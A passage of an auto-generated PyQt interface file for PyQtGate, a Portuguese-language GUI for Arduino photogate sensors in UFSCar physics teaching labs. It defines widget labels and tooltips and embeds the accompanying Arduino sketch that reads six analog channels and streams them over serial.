self.l_channel_9.setText(_translate("PyQtGate", "segundos", None))
self.cB_subida_1.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na subida em relação à referência</p></body></html>", None))
self.cB_subida_1.setText(_translate("PyQtGate", "Subida", None))
self.l_channel_10.setText(_translate("PyQtGate", "segundos", None))
self.lE_time_3.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Tempo de disparo</p></body></html>", None))
self.lE_time_3.setText(_translate("PyQtGate", "0", None))
self.cB_descida_5.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na descida em relação à referência</p></body></html>", None))
self.cB_descida_5.setText(_translate("PyQtGate", "Descida", None))
self.l_channel_11.setText(_translate("PyQtGate", "segundos", None))
self.cB_descida_6.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na descida em relação à referência</p></body></html>", None))
self.cB_descida_6.setText(_translate("PyQtGate", "Descida", None))
self.cB_subida_3.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na subida em relação à referência</p></body></html>", None))
self.cB_subida_3.setText(_translate("PyQtGate", "Subida", None))
self.sP_channel_5.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Varre os tempos disparados.</p></body></html>", None))
self.sP_channel_6.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Varre os tempos disparados.</p></body></html>", None))
self.cB_subida_2.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na subida em relação à referência</p></body></html>", None))
self.cB_subida_2.setText(_translate("PyQtGate", "Subida", None))
self.sP_channel_1.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Varre os tempos disparados.</p></body></html>", None))
self.cB_descida_4.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na descida em relação à referência</p></body></html>", None))
self.cB_descida_4.setText(_translate("PyQtGate", "Descida", None))
self.cB_subida_5.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na subida em relação à referência</p></body></html>", None))
self.cB_subida_5.setText(_translate("PyQtGate", "Subida", None))
self.cB_descida_3.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na descida em relação à referência</p></body></html>", None))
self.cB_descida_3.setText(_translate("PyQtGate", "Descida", None))
self.cB_subida_6.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na subida em relação à referência</p></body></html>", None))
self.cB_subida_6.setText(_translate("PyQtGate", "Subida", None))
self.l_channel_7.setText(_translate("PyQtGate", "segundos", None))
self.lE_time_6.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Tempo de disparo</p></body></html>", None))
self.lE_time_6.setText(_translate("PyQtGate", "0", None))
self.lE_time_2.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Tempo de disparo</p></body></html>", None))
self.lE_time_2.setText(_translate("PyQtGate", "0", None))
self.cB_descida_1.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na descida em relação à referência</p></body></html>", None))
self.cB_descida_1.setText(_translate("PyQtGate", "Descida", None))
self.lE_time_4.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Tempo de disparo</p></body></html>", None))
self.lE_time_4.setText(_translate("PyQtGate", "0", None))
self.tab_views.setTabText(self.tab_views.indexOf(self.tab_separados), _translate("PyQtGate", "Separados", None))
self.pW_all.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Gráfico de amostragem dos seis canais em que a ordenada (restrita ao intervalo de 0 a 1023) é porporcional à voltagem medida nas respectivas portas óticas e a abscissa corresponde ao tempo em segundos.</p></body></html>", None))
self.tW_timetable.setToolTip(_translate("PyQtGate", "<html><head/><body><p><span style=\" font-weight:400;\">Tabela de tempos (em segundos) de disparo dos canais selecionados. Tempos positivos referem-se à subida e negativos à descida.</span></p></body></html>", None))
self.pB_timetable.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Gera tabela de tempos de disparo na subida e/ou descida conforme os níveis de referência de cada canal</p></body></html>", None))
self.pB_timetable.setText(_translate("PyQtGate", "Gerar tempos", None))
self.tab_views.setTabText(self.tab_views.indexOf(self.tab_juntos), _translate("PyQtGate", "Juntos", None))
self.cB_constrain.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Vincula os controles de referência ao canal 1</p></body></html>", None))
self.cB_constrain.setText(_translate("PyQtGate", "Vincular ao canal 1", None))
self.cB_channel_1.setText(_translate("PyQtGate", "Canal 1", None))
self.cB_channel_2.setText(_translate("PyQtGate", "Canal 2", None))
self.cB_channel_3.setText(_translate("PyQtGate", "Canal 3", None))
self.cB_channel_4.setText(_translate("PyQtGate", "Canal 4", None))
self.cB_channel_5.setText(_translate("PyQtGate", "Canal 5", None))
self.cB_channel_6.setText(_translate("PyQtGate", "Canal 6", None))
self.label_8.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Atraso adicional entre cada aquisição (0 a 65535 ms)</p></body></html>", None))
self.label_8.setText(_translate("PyQtGate", "Atraso:", None))
self.lE_delay.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Atraso adicional entre cada aquisição (0 a 65535 ms)</p></body></html>", None))
self.lE_delay.setText(_translate("PyQtGate", "0", None))
self.label_9.setText(_translate("PyQtGate", "ms", None))
self.tabPrincipal.setTabText(self.tabPrincipal.indexOf(self.tab_mostrador), _translate("PyQtGate", "Mostrador", None))
self.pB_save.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Salva arquivo com as formas de onda completas de todos os canais</p></body></html>", None))
self.pB_save.setText(_translate("PyQtGate", "Salvar formas de onda", None))
self.pB_load.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Lê arquivo com as formas de onda completas</p></body></html>", None))
self.pB_load.setText(_translate("PyQtGate", "Ler formas de onda", None))
self.pB_savetime.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Salva arquivo com os tempos de disparo dos canais selecionados de acordo com a tabela de tempos</p></body></html>", None))
self.pB_savetime.setText(_translate("PyQtGate", "Salvar tabela de tempos", None))
self.tabPrincipal.setTabText(self.tabPrincipal.indexOf(self.tab_arquivo), _translate("PyQtGate", "Arquivo", None))
self.pB_connect.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Seleciona automaticamente a porta USB em que a placa Arduino está conectada. É necessário que a Arduino esteja pré-carregada com o código Photogate específico.</p></body></html>", None))
self.pB_connect.setText(_translate("PyQtGate", "Selecionar porta automaticamente", None))
self.label_2.setText(_translate("PyQtGate", "Comunicação serial com Arduino", None))
self.pB_closeconnection.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Interrompa a conexão com a placa Arduino.</p></body></html>", None))
self.pB_closeconnection.setText(_translate("PyQtGate", "Interromper", None))
self.label.setText(_translate("PyQtGate", "Selecionar da lista:", None))
self.cB_port.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Selecione de uma lista a porta USB em que a placa Arduino está conectada. É necessário que a Arduino esteja pré-carregada com o código Photogate específico.</p></body></html>", None))
self.label_25.setText(_translate("PyQtGate", "Comunicação:", None))
self.l_commstatus.setText(_translate("PyQtGate", "não iniciada", None))
self.tabPrincipal.setTabText(self.tabPrincipal.indexOf(self.tab_serial), _translate("PyQtGate", "Serial", None))
self.l_ufscar.setText(_translate("PyQtGate", "TextLabel", None))
self.l_cca.setText(_translate("PyQtGate", "TextLabel", None))
self.label_3.setText(_translate("PyQtGate", "Centro de Ciências Agrárias", None))
self.textBrowser.setHtml(_translate("PyQtGate", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:12pt; font-weight:600;\">PyQtGate</span></p>\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt; font-weight:600;\">Last update: Mar 03 2017</span></p>\n"
"<p align=\"center\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:12pt; font-weight:600;\"><br /></p>\n"
"<p align=\"justify\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt;\">PyQtGate tem como objetivo oferecer uma interface gráfica para o hardware de portas óticas utilizado nos Laboratórios de Ensino de Física do Centro de Ciências Agrárias da Universidade Federal de São Carlos (CCA-UFSCar).</span></p>\n"
"<p align=\"justify\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:10pt;\"><br /></p>\n"
"<p align=\"justify\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt;\">PyQtGate foi desenvolvido em PyQt e deve ser utilizado em conjunto com os hardwares de aquisição do sistema de portas óticas composto por: (i) placa de prototipagem Arduino Uno, (ii) Photogate Shield para Arduino Uno e (iii) conjunto de sensores óticos. A placa Arduino deve ser carregada com o código específico APGate, cuja cópia encontra-se abaixo. Com excessão da placa Arduino, todas as peças de hardware e todos os softwares foram desenvolvidos no CCA-UFSCar.</span></p>\n"
"<p align=\"justify\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:10pt;\"><br /></p>\n"
"<p align=\"justify\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt;\">O Shield Photogate para Arduino foi desenvolvido usando a ferramenta online para criação de circuitos eletrônicos EasyEDA e encontra-se disponível em: https://easyeda.com</span></p>\n"
"<p align=\"justify\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:10pt;\"><br /></p>\n"
"<p align=\"right\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt;\">João Teles</span></p>\n"
"<p align=\"right\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt;\">jteles@cca.ufscar.br</span></p>\n"
"<p align=\"right\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt;\">Outubro/2016</span></p>\n"
"<p align=\"right\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:10pt;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:10pt;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">/*APGate: Arduino PhotoGate para uso nos dispositivos de portas óticas dos Laboratórios</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">de Ensino de Física do CCA-UFSCar.</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Esse codigo deve ser carregado na placa Arduino UNO que deve operar em conjunto</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">com os hardwares Shield Photogate e sensores óticos. A comunicao deve ser feita com</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">o software PyQtGate.</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Joao Teles, jteles@cca.ufscar.br</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Last update: Mar 03 2017</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">--------------------------------</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Analog pin 0: canal 1</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Analog pin 1: canal 2</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Analog pin 2: canal 3</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Analog pin 3: canal 4</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Analog pin 4: canal 5</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Analog pin 5: canal 6</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">*/</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">//Defines for setting and clearing register bits for faster analog readings</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">#ifndef cbi</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">#define cbi(sfr, bit) (_SFR_BYTE(sfr) &= ~_BV(bit))</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">#endif</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">#ifndef sbi</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">#define sbi(sfr, bit) (_SFR_BYTE(sfr) |= _BV(bit))</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">#endif</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">char msg_co[9] = "Photo_co"; //Signal from pc asking to connect</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">char msg_ok[9] = "Photo_ok"; //Connection confirmation signal from arduino to pc</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">char msg_st[9] = "Photo_st"; //Signal from pc confirming sequence start</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">char msg_t[9] = "01234567";</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">int i, v;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">int y[7];</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">unsigned char a, b;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">unsigned char a3, a2, a1, a0;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">unsigned long t0, t;</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">void erase_msg_t(void);</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">void setup() {</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> // set prescale to 16 (128 is the default) for improving analog reading time:</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> sbi(ADCSRA,ADPS2) ;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> cbi(ADCSRA,ADPS1) ;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> cbi(ADCSRA,ADPS0) ;</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.begin(115200);</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">}</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">void loop() {</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> //Read command message from pc:</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> if (Serial.available() > 7)</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> for (i = 0; i < 8; i++) msg_t[i] = Serial.read();</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> //Confirmation of pc-arduino communication:</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> if (strcmp(msg_t, msg_co) == 0) {</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> for (i = 0; i < 8; i++) </p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(msg_ok[i]);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> }</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> //Acquisition start:</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> if (strcmp(msg_t, msg_st) == 0) {</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> </p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> while (Serial.available() < 2) {}</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a = Serial.read();</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> b = Serial.read();</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> </p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> v = ((int)a)*256 + ((int)b);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> </p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> t0 = micros();</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> while (Serial.available() == 0) {</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> y[0] = analogRead(0);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> y[1] = analogRead(1);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> y[2] = analogRead(2);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> y[3] = analogRead(3);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> y[4] = analogRead(4);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> y[5] = analogRead(5);</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> t = micros()-t0;</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> for (i = 0; i < 6; i++) {</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a1 = y[i]/256;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a0 = y[i]%256;</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(a0);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(a1);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> }</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a3 = t/16777216;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a2 = (t-a3*16777216)/65536;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a1 = (t-a3*16777216-a2*65536)/256;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a0 = t-a3*16777216-a2*65536-a1*256;</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(a0);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(a1);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(a2);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(a3);</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> delay(v);</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> }</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
